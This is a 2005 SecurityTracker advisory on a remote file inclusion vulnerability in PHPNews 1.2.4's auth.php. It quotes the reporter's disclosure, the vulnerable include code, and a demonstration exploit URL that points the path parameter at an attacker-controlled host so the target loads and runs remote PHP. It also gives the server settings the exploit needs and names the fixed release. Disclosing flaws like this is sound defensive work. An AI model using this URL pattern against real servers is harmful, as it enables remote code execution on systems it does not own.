SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   PHPNews Vendors:   newsphp.sourceforge.net
PHPNews 'auth.php' Include File Flaw Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1013345
SecurityTracker URL:  http://securitytracker.com/id/1013345
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 2 2005
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): 1.2.4
Description:   An include file vulnerability was reported in PHPNews. A remote user can execute arbitrary commands on the target system.

The 'auth.php' script does not properly validate the user-supplied path variable. A remote user can supply a specially crafted URL to cause the script to include and execute PHP code from a remote location.

If register_globals and allow_url_fopen are set to 'on', this flaw can be exploited.

A demonstration exploit URL that will execute the 'en_GB.admin.lng' or 'admin.lng' file from the attacker's server is provided:

http://[target]/[dir]/auth.php?path=http://[attacker]/

Filip Groszynski reported this vulnerability.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system. The code will run with the privileges of the target web service.
Solution:   The vendor has released a fixed version (1.2.5), available at:

http://newsphp.sourceforge.net/downloads.php

Vendor URL:  newsphp.sourceforge.net/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  PHP News <= 1.2.4 - Remote File Inclusion (VXSfx)




-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Name:       PHP News
Version:    1.2.4 (and possibly 1.2.3)
Homepage:   http://newsphp.sourceforge.net/

Author:     Filip Groszynski   (VXSfx)
Date:       23 February 2005
-- == -- == -- == -- == -- == -- == -- == -- == -- == --

Vulnerable code in auth.php:

  if (is_Array($userDetails)) {
    ...
  }
  /* You're about to log in/no user language is specified */
  else if(file_exists($path . 'languages/' . $lang . '.admin.lng')) {
    include_once($path . 'languages/' . $lang . '.admin.lng');
    ....
  } else {
    include_once($path . 'languages/en_GB.admin.lng');
    ....
  }

--------------------------------------------------------

Example:

  if register_globals=on and allow_url_fopen=on:
    http://[victim]/[dir]/auth.php?path=http://[hacker_box]/

--------------------------------------------------------

Fix and Vendor status:

  Vendor has been notified, expect an official patch tomorrow.
  
--------------------------------------------------------

Contact:

    Author:    Filip Groszynski   (VXSfx)
    Location:  Poland <Warsaw>
    Email:     groszynskif <at> gmail <dot> com
    HP:        http://shell.homeunix.org

-- == -- == -- == -- == -- == -- == -- == -- == -- == --

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC